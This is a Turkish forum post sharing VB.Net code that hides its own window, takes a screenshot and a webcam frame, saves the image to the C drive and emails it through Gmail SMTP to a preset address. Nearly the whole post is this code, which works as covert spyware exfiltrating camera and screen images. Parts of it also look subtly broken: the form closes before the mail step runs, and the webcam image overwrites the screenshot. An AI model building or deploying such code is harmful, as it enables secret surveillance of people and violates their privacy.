Neler Yeni

Vb.Net WebCam Görüntü Alıp Mail Atma

BaybarsMirza

Kullanıcı
Katılım
6 Ara 2017
Mesajlar
5
Beğeniler
0
Puanları
1
Konum
Sakarya
#1

Kodlar sağlıklı bir şekilde çalışmaktadır windows 10 pc de denendi. Projeyi yönetici olarak çalıştıracak şekilde ayarlayınız.KODLAR:


Imports Emgu.CV
Imports Emgu.CV.UI
Imports Emgu.CV.Structure
Imports System.Net.Mail


Public Class Form1

Dim cap As New Capture() ’first line
Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load

Me.Hide()

Threading.Thread.Sleep(1000)
Dim YukseklikGenislik As Size = New Size(My.Computer.Screen.Bounds.Width,
My.Computer.Screen.Bounds.Height)
Dim EkranGoruntusu As New Bitmap(My.Computer.Screen.Bounds.Width,
My.Computer.Screen.Bounds.Height)
Dim grafik As System.Drawing.Graphics =
System.Drawing.Graphics.FromImage(EkranGoruntusu)
grafik.CopyFromScreen(New Point(0, 0), New Point(0, 0), YukseklikGenislik)
EkranGoruntusu.Save("C:\\WebcamGrnt.jpg", System.Drawing.Imaging.ImageFormat.Jpeg)

PictureBox1.Image = cap.QueryFrame.ToBitmap() ’Second line
Dim deee As Image
deee = PictureBox1.Image
deee.Save("C:\\WebcamGrnt.jpg", System.Drawing.Imaging.ImageFormat.Jpeg)


Me.Close()

’mail atma kısmı**********************************


Dim Mail As New MailMessage
Mail.Subject = "Konu / WebCam Görüntüsü"
Mail.To.Add("******@gmail.com") ’ Gönerilecek Mail
Mail.From = New MailAddress("*****@gmail.com") ’ Kendi Mailiniz
Mail.BOdy = ("Ekran Görüntüsü ")
Dim ekler As New Attachment("C:\\WebcamGrnt.jpg") ’ ekler değişkeni konumdan resim alır
Mail.Attachments.Add(ekler)
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("*******@gmail.com", "Şifre") ’ Kendi Mailiniz Ve Şifreniz
SMTP.Port = "587"
SMTP.Send(Mail)
End Sub
End Class
 

Üst